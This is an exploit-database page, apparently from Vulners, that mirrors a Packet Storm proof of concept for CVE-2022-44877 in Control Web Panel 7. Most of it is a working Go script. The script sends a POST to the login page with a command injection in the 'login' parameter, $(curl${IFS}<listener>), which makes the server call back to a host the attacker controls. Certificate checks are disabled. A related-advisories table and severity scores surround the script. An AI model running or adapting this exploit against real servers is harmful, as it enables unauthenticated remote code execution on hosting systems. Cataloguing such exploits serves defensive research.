Vulners
Lucene search
Control Web Panel 7 (CWP7) 0.9.8.1147 Remote Code Execution
🗓️ 06 Apr 2023 00:00:00Reported by Mayank DeshmukhType 
packetstorm🔗 packetstormsecurity.com👁 285 Views
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Control Web Panel 7 Remote Code Execution Vulnerability | 10 Jan 202300:00 | – | zdt |
| Control Web Panel Unauthenticated Remote Command Execution Exploit | 31 Jan 202300:00 | – | zdt |
| Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution Vulnerability | 2 Apr 202300:00 | – | zdt |
| Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution Exploit | 5 Apr 202300:00 | – | zdt |
 | CVE-2022-44877 | 5 Jan 202300:00 | – | attackerkb |
 | Exploit for OS Command Injection in Control-Webpanel Webpanel | 15 Feb 202315:22 | – | githubexploit |
 | CVE-2022-44877 | 5 Jan 202319:40 | – | circl |
 | CWP Control Web Panel OS Command Injection Vulnerability | 17 Jan 202300:00 | – | cisa_kev |
 | CentOS Web Panel 操作系统命令注入漏洞 | 5 Jan 202300:00 | – | cnnvd |
 | CVE-2022-44877 | 5 Jan 202300:00 | – | cve |
10
`// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020
package main
import (
"bytes"
"crypto/tls"
"fmt"
"net/http"
"flag"
"time"
)
func main() {
var host,call string
flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
flag.Parse()
banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)
`
fmt.Printf(banner)
fmt.Println("[*] Triggering cURL command")
fmt.Println("[*] Open Listener on " + call + "")
//Skip certificate validation
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
client := &http.Client{Transport: tr}
// Request URL
url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"
// Request body
body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))
// Create HTTP client and send POST request
req, err := http.NewRequest("POST", url, body)
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
fmt.Println("Error sending request:", err)
return
}
time.Sleep(2 * time.Second)
defer resp.Body.Close()
fmt.Println("\n[*] Check Listener for OOB callback")
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2023 00:00Current
9.4High risk
Vulners AI Score9.4
CVSS 3.19.8
EPSS0.94457